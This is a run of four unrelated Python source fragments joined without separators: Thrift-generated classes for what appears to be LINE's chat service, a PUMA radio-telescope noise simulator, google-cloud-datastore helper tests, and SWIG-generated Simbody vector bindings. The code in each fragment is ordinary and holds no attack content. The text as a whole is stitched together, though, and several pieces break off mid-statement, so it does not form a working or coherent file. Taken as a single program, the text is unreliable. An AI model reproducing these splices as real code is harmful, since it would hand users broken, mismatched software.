oprot): self.validate() oprot.writeStructBegin('getOAFriendMids_args') oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class getOAFriendMids_result(object): """ Attributes: - success - e """ def __init__(self, success=None, e=None): self.success = success self.e = e def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 0: if ftype == TType.LIST: self.success = [] (_, elem1077) = iprot.readListBegin() for _ in range(elem1077): elem1078 = iprot.readString() self.success.append(elem1078) iprot.readListEnd() else: iprot.skip(ftype) elif fid == 1: if ftype == TType.STRUCT: self.e = TalkException() self.e.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def 
write(self, oprot): self.validate() oprot.writeStructBegin('getOAFriendMids_result') if self.success is not None: oprot.writeFieldBegin('success', TType.LIST, 0) oprot.writeListBegin(TType.STRING, len(self.success)) for elem1079 in self.success: oprot.writeString(elem1079) oprot.writeListEnd() oprot.writeFieldEnd() if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __hash__(self): value = 17 value = (value * 31) ^ hash(make_hashable(self.success)) value = (value * 31) ^ hash(make_hashable(self.e)) return value def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.items()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class searchPaidCallUserRate_args(object): """ Attributes: - countryCode - language """ def __init__(self, countryCode=None, language=None): self.countryCode = countryCode self.language = language def read(self, iprot): iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 2: if ftype == TType.STRING: self.countryCode = iprot.readString() else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRING: self.language = iprot.readString() else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() self.validate() def write(self, oprot): self.validate() oprot.writeStructBegin('searchPaidCallUserRate_args') if self.countryCode is not None: oprot.writeFieldBegin('countryCode',
"""PUMA Noise simulator Follows https://arxiv.org/abs/1810.09572. Includes a general RadioTelescope class that defines a telescope in terms of various dish, packing, and instrumental noise properties, as well as instances of this class for the full and petite configurations of PUMA (see https://arxiv.org/abs/1907.12559). All spatial units are Mpc, not Mpc/h !! """ import numpy as np from .castorina import castorinaBias,castorinaPn import pyccl as ccl class RadioTelescope: """Class for computing signal and noise properties of a radio telescope. Uses signal and noise models from Appendices B and D of the Cosmic Visions 21cm white paper, https://arxiv.org/pdf/1810.09572v3.pdf. Attributes ---------- C : ccl.Cosmology class CCL class defining the background cosmology. Nside : int, optional Number of receivers per side of square array (default: 256) D : float, optional Physical diameter of dishes, in m (default: 6) tint : float, optional Integration time of survey, in y (default: 5) fsky : float, optional Observed sky fraction (default: 0.5) effic : float, optional Dish aperture efficiency factor, such that the effective dish area is A_eff = effic * A_phys (default: 0.7) Tampl : float, optional Amplifier noise temperature, in K (default: 50) Tground : float, optional Ground temperature, in K (default: 300) omtcoupling : float, optional Optical efficiency of receivers, which boosts the effective Tampl by 1/omtcoupling (default: 0.9) skycoupling : float, optional Coupling of the primary beam to the sky, such that a fraction (1-skycoupling) of the beam hits the ground instead of the sky (default: 0.9) hexpack : bool, optional True if dishes are hex-packed, False if they are square-packed (default: True) """ def __init__ (self,C,Nside=256, D=6, tint=5, fsky=0.5, effic=0.7, Tampl=50., Tground=300., omtcoupling=0.9, skycoupling=0.9, hexpack=True): # CCL cosmology class self.C=C # Number of dishes per array side self.Nside=Nside # Total number of dishes self.Nd=Nside**2 # Roughly, maximum baseline length in square array self.Dmax=Nside*np.sqrt(2)*D # m # Physical dish diameter self.D=D # m # Effective dish diameter self.Deff=self.D*np.sqrt(effic) # m # Total integration time self.ttotal=tint*365*24*3600 # s # Sky area self.Sarea=4*np.pi*fsky # sr # Sky fraction self.fsky=fsky # Effective dish area self.Ae=np.pi/4*D**2*effic # m^2 # Contribution to system temperature from amplifier and groundspill # (Eq. D1 in paper) self.Tscope=Tampl/omtcoupling/skycoupling+Tground*(1-skycoupling)/skycoupling # K # Hex packing setting self.hexpack=hexpack def nofl(self,x): """Number density of baselines on the ground. Parameters ---------- x : float or array Baseline length(s), in m. Returns ------- res : float or array Number density of baselines of given length(s), in m^-2. """ ### quadratic packing if (not self.hexpack): ### square packing a,b,B,C,D=0.4847, -0.330, 1.3157, 1.5975, 6.8390 else: ### hexagonal packing a,b,B,C,D=0.56981864, -0.52741196, 0.8358006 , 1.66354748, 7.31776875 # Scale physical distances by Nside*D xn=np.asarray(x)/(self.Nside*self.D) # Fitting function prefactor n0=(self.Nside/self.D)**2 # m^-2 # Fitting formula evaluation res=np.asarray( n0*(a+b*xn)/(1+B*xn**C)*np.exp(-(xn)**D) ) # m^-2 # Impose numerical floor on result if (res.shape == ()): res = np.max([res,1e-10]) else: res[res<1e-10]=1e-10 return res def PNoise(self,z,kperp): """Thermal noise power spectrum. Parameters ---------- z : float Redshift. kperp : float or array kperp value(s), in Mpc^-1. 
Returns ------- Pn : float or array Thermal noise power spectrum, in K^2 Mpc^3. """ # Observed wavelength lam=0.21*(1+z) # m # Comoving radial distance to redshift z r=ccl.comoving_radial_distance(self.C,1/(1.+z)) # Mpc # Conversion between kperp and uv-plane (vector norm) u u=np.asarray(kperp)*r/(2*np.pi) # Baseline length corresponding to u l=u*lam # m # Number density of baselines in uv plane Nu = self.nofl(l)*lam**2 # Inaccurate approximation for uv-plane baseline density #umax=self.Dmax/lam #Nu=self.Nd**2/(2*np.pi*umax**2) # Field of view of single dish FOV=(lam/self.Deff)**2 # sr # Hubble parameter H(z) Hz=self.C['H0']*ccl.h_over_h0(self.C,1./(1.+z)) # km s^-1 Mpc^-1 # Conversion factor from frequency to physical space y=3e5*(1+z)**2/(1420e6*Hz) # Mpc s # System temperature (sum of telescope and sky temperatures) Tsys=self.Tsky(1420./(1+z))+self.Tscope # K # 21cm noise power spectrum (Eq. D4 of paper). # Hard-codes 2 polarizations Pn=Tsys**2*r**2*y*(lam**4/self.Ae**2)* 1/(2*Nu*self.ttotal) * (self.Sarea/FOV) # K^2 Mpc^3 # Catastrophically fail if we've gotten negative power spectrum values if np.any(Pn<0): print (Nu,Pn,l, self.nofl(l), self.nofl(l/2)) stop() return Pn def PNoiseShot(self,z,Tb): """21cm shot noise power spectrum. Parameters ---------- z : float Redshift. Tb : float Mean 21cm brightness temperature (your choice of units). Returns ------- pn : float or array Shot noise power spectrum, in Mpc^3 times square of input Tb units. """ return Tb**2*castorinaPn(z)/(self.C['h'])**3 def PNoiseKFull(self,z,kperp,kpar, Tb=None,kparcut=0.01*0.7): """Full 21cm noise power spectrum, with specified kpar cut Parameters ---------- z : float Redshift. kperp : array[nkpar,nkperp] 2d array where columns are kperp values (in Mpc^-1) and rows are identical. Generate e.g. with np.outer(np.ones(nkpar),kperp_vec) where kperp_vec is a list of kperp values. kpar : array[nkpar,nkperp] 2d array where rows are kpar values (in Mpc^-1) and columns are identical. Tb : float, optional Mean 21cm brightness temperature, in K (default: computed automatically). kparcut : float, optional Set Pnoise to large value if kpar<kparcut, in Mpc^-1 (default: 0.007). Returns ------- Pn : array[nkpar,nkperp] Array of sums of 21cm thermal noise and shot noise power spectra, in K^2 Mpc^3. """ assert(len(kperp.shape)==2) assert(len(kpar.shape)==2) if Tb is None: Tb=self.Tb(z) Pn=self.PNoise(z,kperp)+self.PNoiseShot(z,Tb) Pn[kpar<kparcut]=1e30 return Pn def PHINoiseKFull(self,z,kperp,kpar, Tb=None,kparcut=0.01*0.7): """Full HI noise power spectrum. This has units of Mpc^3, and is therefore the noise power spectrum of P_HI(k), incorporating both HI shot noise and telescope thermal noise. Input parameters are same as PNoiseKFull. Returns ------- Pn : array[nkpar,nkperp] Array of effective HI noise power spectrum, in Mpc^3. """ if Tb is None: Tb = self.Tb(z) return self.PNoiseKFull(z,kperp,kpar,Tb=Tb,kparcut=kparcut) / Tb**2 def bias(self,z): """HI bias with redshift. Parameters ---------- z : float or array Redshift(s). Returns ------- b : float or array b_HI(z) values. """ return castorinaBias(z) def Tsky(self,f): """Mean sky temperature, including Galactic synchrotron and CMB. Parameters ---------- f : float or array Frequency or array of frequencies, in MHz. Returns ------- Tsky : float or array Sky temperature(s), in K. """ #return (f/100.)**(-2.4)*2000+2.7 ## from CVFisher return 25.*(np.asarray(f)/400.)**(-2.75) +2.75 def TbTZ(self,z): """Approximation for mean 21cm brightness temperature. This is from Chang et al. 
2008, https://arxiv.org/pdf/0709.3672.pdf, Eq. 1. Parameters ---------- z : float or array Redshift(s). Returns ------- Tb : float or array Temperature values, in K. """ OmegaM=0.31 z = np.asarray(z) return 0.3e-3*np.sqrt((1+z)/(2.5)*0.29/(OmegaM+(1.-OmegaM)/(1+z)**3)) def Tb(self,z): """Approximation for mean 21cm brightness temperature. This is reasonably up-to-date, and comes from Eq. B1 in the CV 21cm paper. Parameters ---------- z : float or array Redshift(s). Returns ------- Tb : float or array Temperature value(s), in K. """ z = np.asarray(z) Ez=ccl.h_over_h0(self.C,1./(1.+z)) # Note potentially misleading notation: # Ohi = (comoving density at z) / (critical density at z=0) Ohi=4e-4*(1+z)**0.6 Tb=188e-3*self.C['h']/Ez*Ohi*(1+z)**2 return Tb def cutWedge(self, noise, kperp, kpar, z, NW=3.0): """Cut the foreground wedge from a 2d noise power spectrum. Parameters ---------- noise : array[nkpar,nkperp] 2d noise power spectrum. kperp : array[nkpar,nkperp] 2d array where columns are kperp values (in Mpc^-1) and rows are identical. kpar : array[nkpar,nkperp] 2d array where rows are kpar values (in Mpc^-1) and columns are identical. z : float Redshift. NW : float, optional Multiplier defining wedge in terms of primary beam. (default = 3) Returns ------- Pn : array[nkpar,nkperp] 2d noise power spectrum where modes within wedge have noise set to large value. """ # Comoving radial distance to redshift z r=ccl.comoving_radial_distance(self.C,1/(1.+z)) # Mpc # Hubble parameter H(z) H=self.C['H0']*ccl.h_over_h0(self.C,1./(1.+z)) # km s^-1 Mpc^-1 # Slope that defines wedge as kpar < kperp * slope. # See Eq. C1 from the CV 21cm paper. slope= r*H/3e5 * 1.22 *0.21/self.D * NW / 2.0 # dimensionless # Boost noise for modes within wedge noiseout=np.copy(noise) noiseout[np.where(kpar<kperp*slope)]=1e30 return noiseout def PSSensitivityTransit (self, freq=600, bandwidth=900): """One sigma point source transit sensitivity Also prints some quantities for comparison: Tsys, t_eff for the input telescope and CHIME, and the point source sensitivity for CHIME. Parameters ---------- freq : float, optional Frequency, in MHz (default = 600). bandwidth : float, optional Bandwidth, in MHz (default = 900). Returns ------- onesigma : float Point source sensitivity, in Jy. """ # Boltzmann constant kB=1.38064852e-23 # J K^-1 # Observed wavelength lam = 3e8/(freq*1e6) # m # Total instrument collecting area Acoll= self.Ae*self.Nd
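# ----------------------------------------------------------------------------
# Minimal usage sketch (illustrative only). It assumes pyccl is installed and
# that the RadioTelescope class above has been imported; the cosmological and
# survey parameter values below are arbitrary examples, not recommendations.
#
#   import numpy as np
#   import pyccl as ccl
#
#   # Background cosmology used internally for distances and H(z)
#   C = ccl.Cosmology(Omega_c=0.25, Omega_b=0.05, h=0.68, n_s=0.96, sigma8=0.81)
#
#   # A PUMA-like configuration: 256x256 six-metre dishes, 5 years, half the sky
#   tel = RadioTelescope(C, Nside=256, D=6, tint=5, fsky=0.5)
#
#   z = 2.0
#   kperp = np.logspace(-2, 0, 50)      # Mpc^-1
#   P_thermal = tel.PNoise(z, kperp)    # thermal noise power spectrum, K^2 Mpc^3
#   Tb = tel.Tb(z)                      # mean 21cm brightness temperature, K
#   P_shot = tel.PNoiseShot(z, Tb)      # HI shot noise, K^2 Mpc^3
# ----------------------------------------------------------------------------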
# Copyright 2014 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import pytest def test__new_value_pb(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import _new_value_pb entity_pb = entity_pb2.Entity() name = "foo" result = _new_value_pb(entity_pb, name) assert isinstance(result, type(entity_pb2.Value()._pb)) assert len(entity_pb._pb.properties) == 1 assert entity_pb._pb.properties[name] == result def test_entity_from_protobuf_w_defaults(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_from_protobuf _PROJECT = "PROJECT" _KIND = "KIND" _ID = 1234 entity_pb = entity_pb2.Entity() entity_pb.key.partition_id.project_id = _PROJECT entity_pb._pb.key.path.add(kind=_KIND, id=_ID) value_pb = _new_value_pb(entity_pb, "foo") value_pb.string_value = "Foo" unindexed_val_pb = _new_value_pb(entity_pb, "bar") unindexed_val_pb.integer_value = 10 unindexed_val_pb.exclude_from_indexes = True array_val_pb1 = _new_value_pb(entity_pb, "baz") array_pb1 = array_val_pb1.array_value.values unindexed_array_val_pb = array_pb1.add() unindexed_array_val_pb.integer_value = 11 unindexed_array_val_pb.exclude_from_indexes = True array_val_pb2 = _new_value_pb(entity_pb, "qux") array_pb2 = array_val_pb2.array_value.values indexed_array_val_pb = array_pb2.add() indexed_array_val_pb.integer_value = 12 entity = entity_from_protobuf(entity_pb._pb) assert entity.kind == _KIND assert entity.exclude_from_indexes == frozenset(["bar", "baz"]) entity_props = dict(entity) assert entity_props == {"foo": "Foo", "bar": 10, "baz": [11], "qux": [12]} # Also check the key.
key = entity.key assert key.project == _PROJECT assert key.namespace is None assert key.kind == _KIND assert key.id == _ID def test_entity_from_protobuf_w_mismatched_value_indexed(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_from_protobuf _PROJECT = "PROJECT" _KIND = "KIND" _ID = 1234 entity_pb = entity_pb2.Entity() entity_pb.key.partition_id.project_id = _PROJECT entity_pb._pb.key.path.add(kind=_KIND, id=_ID) array_val_pb = _new_value_pb(entity_pb, "baz") array_pb = array_val_pb.array_value.values unindexed_value_pb1 = array_pb.add() unindexed_value_pb1.integer_value = 10 unindexed_value_pb1.exclude_from_indexes = True unindexed_value_pb2 = array_pb.add() unindexed_value_pb2.integer_value = 11 with pytest.raises(ValueError): entity_from_protobuf(entity_pb._pb) def test_entity_from_protobuf_w_entity_no_key(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import entity_from_protobuf entity_pb = entity_pb2.Entity() entity = entity_from_protobuf(entity_pb._pb) assert entity.key is None assert dict(entity) == {} def test_entity_from_protobuf_w_pb2_entity_no_key(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import entity_from_protobuf entity_pb = entity_pb2.Entity() entity = entity_from_protobuf(entity_pb) assert entity.key is None assert dict(entity) == {} def test_entity_from_protobuf_w_entity_with_meaning(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_from_protobuf entity_pb = entity_pb2.Entity() name = "hello" value_pb = _new_value_pb(entity_pb, name) value_pb.meaning = meaning = 9 value_pb.string_value = val = u"something" entity = entity_from_protobuf(entity_pb) assert entity.key is None assert dict(entity) == {name: val} assert entity._meanings == {name: (meaning, val)} def test_entity_from_protobuf_w_nested_entity_no_key(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_from_protobuf PROJECT = "FOO" KIND = "KIND" INSIDE_NAME = "IFOO" OUTSIDE_NAME = "OBAR" INSIDE_VALUE = 1337 entity_inside = entity_pb2.Entity() inside_val_pb = _new_value_pb(entity_inside, INSIDE_NAME) inside_val_pb.integer_value = INSIDE_VALUE entity_pb = entity_pb2.Entity() entity_pb.key.partition_id.project_id = PROJECT element = entity_pb._pb.key.path.add() element.kind = KIND outside_val_pb = _new_value_pb(entity_pb, OUTSIDE_NAME) outside_val_pb.entity_value.CopyFrom(entity_inside._pb) entity = entity_from_protobuf(entity_pb._pb) assert entity.key.project == PROJECT assert entity.key.flat_path == (KIND,) assert len(entity) == 1 inside_entity = entity[OUTSIDE_NAME] assert inside_entity.key is None assert len(inside_entity) == 1 assert inside_entity[INSIDE_NAME] == INSIDE_VALUE def test_entity_from_protobuf_w_index_mismatch_w_empty_list(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import entity_from_protobuf _PROJECT = "PROJECT" _KIND = "KIND" _ID = 1234 array_val_pb = entity_pb2.Value(array_value=entity_pb2.ArrayValue(values=[])) entity_pb = entity_pb2.Entity(properties={"baz": array_val_pb}) entity_pb.key.partition_id.project_id = _PROJECT 
entity_pb.key._pb.path.add(kind=_KIND, id=_ID) entity = entity_from_protobuf(entity_pb._pb) entity_dict = dict(entity) assert entity_dict["baz"] == [] def _compare_entity_proto(entity_pb1, entity_pb2): assert entity_pb1.key == entity_pb2.key value_list1 = sorted(entity_pb1.properties.items()) value_list2 = sorted(entity_pb2.properties.items()) assert len(value_list1) == len(value_list2) for pair1, pair2 in zip(value_list1, value_list2): name1, val1 = pair1 name2, val2 = pair2 assert name1 == name2 if val1._pb.HasField("entity_value"): # Message field (Entity) assert val1.meaning == val2.meaning _compare_entity_proto(val1.entity_value, val2.entity_value) else: assert val1 == val2 def test_enity_to_protobf_w_empty(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import entity_to_protobuf entity = Entity() entity_pb = entity_to_protobuf(entity) _compare_entity_proto(entity_pb, entity_pb2.Entity()) def test_enity_to_protobf_w_key_only(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import entity_to_protobuf from google.cloud.datastore.key import Key kind, name = "PATH", "NAME" project = "PROJECT" key = Key(kind, name, project=project) entity = Entity(key=key) entity_pb = entity_to_protobuf(entity) expected_pb = entity_pb2.Entity() expected_pb.key.partition_id.project_id = project path_elt = expected_pb._pb.key.path.add() path_elt.kind = kind path_elt.name = name _compare_entity_proto(entity_pb, expected_pb) def test_enity_to_protobf_w_simple_fields(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_to_protobuf entity = Entity() name1 = "foo" entity[name1] = value1 = 42 name2 = "bar" entity[name2] = value2 = u"some-string" entity_pb = entity_to_protobuf(entity) expected_pb = entity_pb2.Entity() val_pb1 = _new_value_pb(expected_pb, name1) val_pb1.integer_value = value1 val_pb2 = _new_value_pb(expected_pb, name2) val_pb2.string_value = value2 _compare_entity_proto(entity_pb, expected_pb) def test_enity_to_protobf_w_with_empty_list(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import entity_to_protobuf entity = Entity() entity["foo"] = [] entity_pb = entity_to_protobuf(entity) expected_pb = entity_pb2.Entity() prop = expected_pb._pb.properties.get_or_create("foo") prop.array_value.CopyFrom(entity_pb2.ArrayValue(values=[])._pb) _compare_entity_proto(entity_pb, expected_pb) def test_enity_to_protobf_w_inverts_to_protobuf(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_from_protobuf from google.cloud.datastore.helpers import entity_to_protobuf original_pb = entity_pb2.Entity() # Add a key. original_pb.key.partition_id.project_id = project = "PROJECT" elem1 = original_pb._pb.key.path.add() elem1.kind = "Family" elem1.id = 1234 elem2 = original_pb._pb.key.path.add() elem2.kind = "King" elem2.name = "Spades" # Add an integer property. val_pb1 = _new_value_pb(original_pb, "foo") val_pb1.integer_value = 1337 val_pb1.exclude_from_indexes = True # Add a string property. 
val_pb2 = _new_value_pb(original_pb, "bar") val_pb2.string_value = u"hello" # Add a nested (entity) property. val_pb3 = _new_value_pb(original_pb, "entity-baz") sub_pb = entity_pb2.Entity() sub_val_pb1 = _new_value_pb(sub_pb, "x") sub_val_pb1.double_value = 3.14 sub_val_pb2 = _new_value_pb(sub_pb, "y") sub_val_pb2.double_value = 2.718281828 val_pb3.meaning = 9 val_pb3.entity_value.CopyFrom(sub_pb._pb) # Add a list property. val_pb4 = _new_value_pb(original_pb, "list-quux") array_val1 = val_pb4.array_value.values.add() array_val1.exclude_from_indexes = False array_val1.meaning = meaning = 22 array_val1.blob_value = b"\xe2\x98\x83" array_val2 = val_pb4.array_value.values.add() array_val2.exclude_from_indexes = False array_val2.meaning = meaning array_val2.blob_value = b"\xe2\x98\x85" # Convert to the user-space Entity. entity = entity_from_protobuf(original_pb) # Convert the user-space Entity back to a protobuf. new_pb = entity_to_protobuf(entity) # NOTE: entity_to_protobuf() strips the project so we "cheat". new_pb.key.partition_id.project_id = project _compare_entity_proto(original_pb, new_pb) def test_enity_to_protobf_w_meaning_with_change(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_to_protobuf entity = Entity() name = "foo" entity[name] = value = 42 entity._meanings[name] = (9, 1337) entity_pb = entity_to_protobuf(entity) expected_pb = entity_pb2.Entity() value_pb = _new_value_pb(expected_pb, name) value_pb.integer_value = value # NOTE: No meaning is used since the value differs from the # value stored. _compare_entity_proto(entity_pb, expected_pb) def test_enity_to_protobf_w_variable_meanings(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import _new_value_pb from google.cloud.datastore.helpers import entity_to_protobuf entity = Entity() name = "quux" entity[name] = values = [1, 20, 300] meaning = 9 entity._meanings[name] = ([None, meaning, None], values) entity_pb = entity_to_protobuf(entity) # Construct the expected protobuf. expected_pb = entity_pb2.Entity() value_pb = _new_value_pb(expected_pb, name) value0 = value_pb.array_value.values.add() value0.integer_value = values[0] # The only array entry with a meaning is the middle one. 
value1 = value_pb.array_value.values.add() value1.integer_value = values[1] value1.meaning = meaning value2 = value_pb.array_value.values.add() value2.integer_value = values[2] _compare_entity_proto(entity_pb, expected_pb) def test_enity_to_protobf_w_dict_to_entity(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import entity_to_protobuf entity = Entity() entity["a"] = {"b": u"c"} entity_pb = entity_to_protobuf(entity) expected_pb = entity_pb2.Entity( properties={ "a": entity_pb2.Value( entity_value=entity_pb2.Entity( properties={"b": entity_pb2.Value(string_value="c")} ) ) } ) assert entity_pb == expected_pb def test_enity_to_protobf_w_dict_to_entity_recursive(): from google.cloud.datastore_v1.types import entity as entity_pb2 from google.cloud.datastore.entity import Entity from google.cloud.datastore.helpers import entity_to_protobuf entity = Entity() entity["a"] = {"b": {"c": {"d": 1.25}, "e": True}, "f": 10} entity_pb = entity_to_protobuf(entity) b_entity_pb = entity_pb2.Entity( properties={ "c": entity_pb2.Value( entity_value=entity_pb2.Entity( properties={"d": entity_pb2.Value(double_value=1.25)} ) ), "e": entity_pb2.Value(boolean_value=True), } ) expected_pb = entity_pb2.Entity( properties={ "a": entity_pb2.Value( entity_value=entity_pb2.Entity( properties={ "b": entity_pb2.Value(entity_value=b_entity_pb), "f": entity_pb2.Value(integer_value=10), } ) ) } ) assert entity_pb == expected_pb def _make_key_pb(project=None, namespace=None, path=()): from google.cloud.datastore_v1.types import entity as entity_pb2 pb = entity_pb2.Key() if project is not None: pb.partition_id.project_id = project if namespace is not None: pb.partition_id.namespace_id = namespace for elem in path: added = pb._pb.path.add() added.kind = elem["kind"] if "id" in elem: added.id = elem["id"] if "name" in elem: added.name = elem["name"] return pb def test_key_from_protobuf_wo_namespace_in_pb(): from google.cloud.datastore.helpers import key_from_protobuf _PROJECT = "PROJECT" pb = _make_key_pb(path=[{"kind": "KIND"}], project=_PROJECT) key = key_from_protobuf(pb) assert key.project == _PROJECT assert key.namespace is None def test_key_from_protobuf_w_namespace_in_pb(): from google.cloud.datastore.helpers import key_from_protobuf _PROJECT
const & e3: SimTK::Vec< 2,SimTK::Vec< 3,double,1 > >::E const & e4: SimTK::Vec< 2,SimTK::Vec< 3,double,1 > >::E const & e5: SimTK::Vec< 2,SimTK::Vec< 3,double,1 > >::E const & e6: SimTK::Vec< 2,SimTK::Vec< 3,double,1 > >::E const & e7: SimTK::Vec< 2,SimTK::Vec< 3,double,1 > >::E const & e8: SimTK::Vec< 2,SimTK::Vec< 3,double,1 > >::E const & """ this = _simbody.new_SpatialVec(*args) try: self.this.append(this) except __builtin__.Exception: self.this = this def setToNaN(self): """ setToNaN(SpatialVec self) Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > * """ return _simbody.SpatialVec_setToNaN(self) def setToZero(self): """ setToZero(SpatialVec self) Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > * """ return _simbody.SpatialVec_setToZero(self) def isNaN(self): """ isNaN(SpatialVec self) -> bool Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > const * """ return _simbody.SpatialVec_isNaN(self) def isInf(self): """ isInf(SpatialVec self) -> bool Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > const * """ return _simbody.SpatialVec_isInf(self) def isFinite(self): """ isFinite(SpatialVec self) -> bool Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > const * """ return _simbody.SpatialVec_isFinite(self) def getDefaultTolerance(): """getDefaultTolerance() -> double""" return _simbody.SpatialVec_getDefaultTolerance() getDefaultTolerance = staticmethod(getDefaultTolerance) def isNumericallyEqual(self, *args): """ isNumericallyEqual(SpatialVec self, Vec3 e, double tol) -> bool Parameters ---------- e: SimTK::Vec< 3,double,1 > const & tol: double isNumericallyEqual(SpatialVec self, Vec3 e) -> bool Parameters ---------- e: SimTK::Vec< 3,double,1 > const & """ return _simbody.SpatialVec_isNumericallyEqual(self, *args) def toString(self): """ toString(SpatialVec self) -> std::string Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > const * """ return _simbody.SpatialVec_toString(self) def set(self, i, value): """ set(SpatialVec self, int i, Vec3 value) Parameters ---------- i: int value: SimTK::Vec< 2,SimTK::Vec< 3,double,1 > >::E const & """ return _simbody.SpatialVec_set(self, i, value) def get(self, i): """ get(SpatialVec self, int i) -> Vec3 Parameters ---------- i: int """ return _simbody.SpatialVec_get(self, i) def __str__(self): """ __str__(SpatialVec self) -> std::string Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > const * """ return _simbody.SpatialVec___str__(self) def __len__(self): """ __len__(SpatialVec self) -> int Parameters ---------- self: SimTK::Vec< 2,SimTK::Vec3 > const * """ return _simbody.SpatialVec___len__(self) __swig_destroy__ = _simbody.delete_SpatialVec __del__ = lambda self: None SpatialVec_swigregister = _simbody.SpatialVec_swigregister SpatialVec_swigregister(SpatialVec) def SpatialVec_size(): """SpatialVec_size() -> int""" return _simbody.SpatialVec_size() def SpatialVec_nrow(): """SpatialVec_nrow() -> int""" return _simbody.SpatialVec_nrow() def SpatialVec_ncol(): """SpatialVec_ncol() -> int""" return _simbody.SpatialVec_ncol() def SpatialVec_getDefaultTolerance(): """SpatialVec_getDefaultTolerance() -> double""" return _simbody.SpatialVec_getDefaultTolerance() class VectorOfSpatialVec(_object): """Proxy of C++ SimTK::Vector_<(SimTK::SpatialVec)> class.""" __swig_setmethods__ = {} __setattr__ = lambda self, name, value: _swig_setattr(self, VectorOfSpatialVec, name, value) __swig_getmethods__ = {} __getattr__ = lambda self, name: _swig_getattr(self, VectorOfSpatialVec, name) __repr__ = _swig_repr def __init__(self, 
*args): """ __init__(SimTK::Vector_<(SimTK::SpatialVec)> self) -> VectorOfSpatialVec __init__(SimTK::Vector_<(SimTK::SpatialVec)> self, VectorOfSpatialVec src) -> VectorOfSpatialVec Parameters ---------- src: SimTK::Vector_< SimTK::SpatialVec > const & __init__(SimTK::Vector_<(SimTK::SpatialVec)> self, int m, SpatialVec initialValue) -> VectorOfSpatialVec Parameters ---------- m: int initialValue: SimTK::Vec< 2,SimTK::Vec< 3,double,1 >,1 > const & """ this = _simbody.new_VectorOfSpatialVec(*args) try: self.this.append(this) except __builtin__.Exception: self.this = this def toString(self): """ toString(VectorOfSpatialVec self) -> std::string Parameters ---------- self: SimTK::Vector_< SimTK::SpatialVec > const * """ return _simbody.VectorOfSpatialVec_toString(self) def get(self, i): """ get(VectorOfSpatialVec self, int i) -> SpatialVec Parameters ---------- i: int """ return _simbody.VectorOfSpatialVec_get(self, i) def set(self, i, value): """ set(VectorOfSpatialVec self, int i, SpatialVec value) Parameters ---------- i: int value: SimTK::Vec< 2,SimTK::Vec< 3,double,1 >,1 > const & """ return _simbody.VectorOfSpatialVec_set(self, i, value) def __str__(self): """ __str__(VectorOfSpatialVec self) -> std::string Parameters ---------- self: SimTK::Vector_< SimTK::SpatialVec > const * """ return _simbody.VectorOfSpatialVec___str__(self) def __len__(self): """ __len__(VectorOfSpatialVec self) -> int Parameters ---------- self: SimTK::Vector_< SimTK::SpatialVec > const * """ return 